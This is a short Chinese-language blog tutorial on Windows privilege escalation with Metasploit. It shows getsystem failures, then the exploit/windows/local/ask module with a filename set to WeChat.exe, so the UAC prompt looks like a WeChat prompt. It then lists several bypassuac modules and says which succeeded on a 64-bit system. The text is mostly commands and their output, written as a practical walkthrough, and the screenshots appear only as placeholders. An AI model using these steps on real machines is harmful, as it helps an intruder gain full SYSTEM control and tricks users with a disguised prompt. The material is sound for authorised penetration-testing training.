msf之提权操作

可紊 提交于 2020-03-07 21:27:04

愿疫情早日结束,重返校园奋斗
使用getsystem来获得最高权限

getsystem

发现却爆出这样的错误

[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

在这里插入图片描述
提高程序运行级别(触发UAC)
msf模块:

use exploit/windows/local/ask
info

在这里插入图片描述

set session 1
show options

在这里插入图片描述
设置弹出内容

set filename WeChat.exe

在这里插入图片描述
看到,并点击是
在这里插入图片描述
弹出新的session
在这里插入图片描述
直接获得system权限

getsystem

在这里插入图片描述
UAC绕过,无需点击
使用msf模块:

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

使用第一个

use exploit/windows/local/bypassuac

在这里插入图片描述
发现此模块适用于x86,我的是x64,姑且试试
结果发现可以
在这里插入图片描述
找到一个最新的,拿一个最新的payload来试试提权

use exploit/windows/local/bypassuac_silentcleanup

在这里插入图片描述
结果不行,还试了上面给出的第二和第三,也不行,系统位数还是有影响的
在这里插入图片描述

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!